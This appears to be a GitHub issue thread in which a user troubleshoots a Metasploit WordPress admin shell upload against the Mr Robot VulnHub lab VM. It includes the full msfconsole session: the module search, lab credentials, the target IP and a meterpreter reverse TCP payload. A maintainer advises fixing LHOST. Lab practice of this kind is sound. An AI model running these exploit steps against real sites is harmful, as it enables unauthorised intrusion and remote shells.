i'm actually trying to enter in the mr robot vm on vulnhub and when i'm trying to use a wordpress exploit it tell me that the exploit comleted but no session was created what can i do ?

[Le8XtN]

┌──(kali㉿kali)-[~]
└─$ msfconsole   

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!

       =[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search wordpress shell

Matching Modules
================

   #   Name                                                     Disclosure Date  Rank       Check  Description
   -   ----                                                     ---------------  ----       -----  -----------
   0   exploit/multi/http/wp_ait_csv_rce                        2020-11-14       excellent  Yes    WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
   1   exploit/unix/webapp/wp_admin_shell_upload                2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   2   exploit/unix/webapp/wp_asset_manager_upload_exec         2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   3   exploit/multi/http/wp_crop_rce                           2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   4   exploit/unix/webapp/wp_mobile_detector_upload_execute    2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   5   exploit/unix/webapp/wp_symposium_shell_upload            2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   6   exploit/unix/webapp/wp_property_upload_exec              2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   7   exploit/multi/http/wp_dnd_mul_file_rce                   2020-05-11       excellent  Yes    Wordpress Drag and Drop Multi File Uploader RCE
   8   exploit/unix/webapp/wp_nmediawebsite_file_upload         2015-04-12       excellent  Yes    Wordpress N-Media Website Contact Form Upload Vulnerability
   9   exploit/multi/http/wp_plugin_backup_guard_rce            2021-05-04       excellent  Yes    Wordpress Plugin Backup Guard - Authenticated Remote Code Execution
   10  exploit/multi/http/wp_plugin_modern_events_calendar_rce  2021-01-29       excellent  Yes    Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution
   11  exploit/multi/http/wp_plugin_sp_project_document_rce     2021-06-14       excellent  Yes    Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution

Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/http/wp_plugin_sp_project_document_rce                                                                                                        

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME elliot
USERNAME => elliot
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.38.1.111
RHOSTS => 10.38.1.111
msf6 exploit(unix/webapp/wp_admin_shell_upload) > EXPLOIT
[-] Unknown command: EXPLOIT
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > 

[adfoster-r7]

You need to set correctly set your LHOST. It's probably set LHOST 10.38.1.1 - but you should confirm this with ipconfig/ifconfig

[Le8XtN]

thank you really much

[adfoster-r7]

I'll pre-emptively close this for now assuming that it worked :+1: